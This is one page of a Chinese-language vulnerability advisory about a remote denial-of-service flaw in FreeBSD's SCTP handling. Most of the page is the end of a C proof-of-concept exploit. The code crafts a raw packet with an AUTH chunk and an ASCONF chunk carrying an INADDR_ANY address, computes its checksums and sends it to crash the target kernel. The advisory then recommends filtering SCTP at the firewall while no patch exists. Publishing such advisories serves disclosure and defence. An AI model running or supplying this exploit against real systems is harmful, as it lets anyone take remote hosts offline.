FreeBSD SCTP空指针引用远程拒绝服务漏洞(4)

/* build AUTH chunk */
    auth_chunk = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr);
    auth_chunk->ch.type = SCTP_AUTH;
    auth_chunk->ch.length = htons(8 + sizeof(struct sctp_auth_chunk));
        auth_chunk->hmac_id = htons(0x1337);
        memset((void *)auth_chunk->hmac, 0x61, 8);
    
        /* build ASCONF chunk */
        asconf_chunk = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8;
        asconf_chunk->ch.type = SCTP_ASCONF;
        asconf_chunk->ch.length = htons(sizeof(struct sctp_asconf_chunk) + sizeof(struct sctp_ipv4addr_param));
        asconf_chunk->serial = 0x41414141; /* whatever */
    
        ipv4_addr = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk)
                                                                        + 8 + sizeof(struct sctp_asconf_chunk);
    
    ipv4_addr->ph.length = htons(sizeof(struct sctp_ipv4addr_param));
        ipv4_addr->ph.type = htons(0x0005);
        ipv4_addr->addr = INADDR_ANY; /* this takes us down the bad code path */
    
        /* what's the length of the whole packet? */
        iph->ip_len = sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8 + sizeof(struct sctp_asconf_chunk)
                                                                                              + sizeof(struct sctp_ipv4addr_param);
    
        /* calculate IP checksum */
    iph->ip_sum = checksum((unsigned short *)crash, iph->ip_len >> 1);

/* calculate SCTP checksum */
    sctph->csum = htonl(sctp_crc32c((const unsigned char *)sctph, sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8
                                                                                           + sizeof(struct sctp_asconf_chunk)
                                                                                         + sizeof(struct sctp_ipv4addr_param)));

printf("[*] sending packet..\n\n");

/* send the bad packet */
    ret = sendto(sock, crash, iph->ip_len, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
    if(ret < 0) {
        printf("[*] error sending packet\n");
        return -1;
    }

printf("[*] done, bad packet sent!\n\n");

free(crash);
    close(sock);

return 0;

}

建议:
--------------------------------------------------------------------------------
厂商补丁:

FreeBSD
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。在补丁发布之前,如果业务不依赖 SCTP,可以考虑在边界防火墙上过滤 SCTP 流量(IP 协议号 132),以减少受影响主机的暴露面。
